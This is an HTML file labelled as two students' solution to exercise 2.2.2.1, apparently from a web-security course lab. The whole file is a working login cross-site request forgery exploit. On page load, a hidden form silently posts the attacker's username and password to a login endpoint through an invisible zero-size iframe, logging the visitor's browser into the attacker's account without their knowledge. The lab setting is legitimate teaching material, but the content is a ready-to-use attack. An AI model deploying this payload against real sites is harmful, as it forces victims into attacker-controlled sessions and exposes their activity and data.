<!--
rwking2 and xhlu15
Solution to 2.2.2.1
-->

<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
    </head>
    <body onload = postAttack.submit()>
        <iframe name="frame" id="frame" frameborder = '0' width='0' height='0' framewidth='0' frameheight='0'></iframe>
        <form action="http://permalink.co:8080/login?csrfdefense=0&xssdefense=5
" method="post" id = "postAttack" name="postAttack" target="frame">
            <input id="username" name="username" type="hidden"value="attacker">
            <input id = "userpass" name="password" type="hidden"value="l33th4x">
        </form>
    </body>
</html>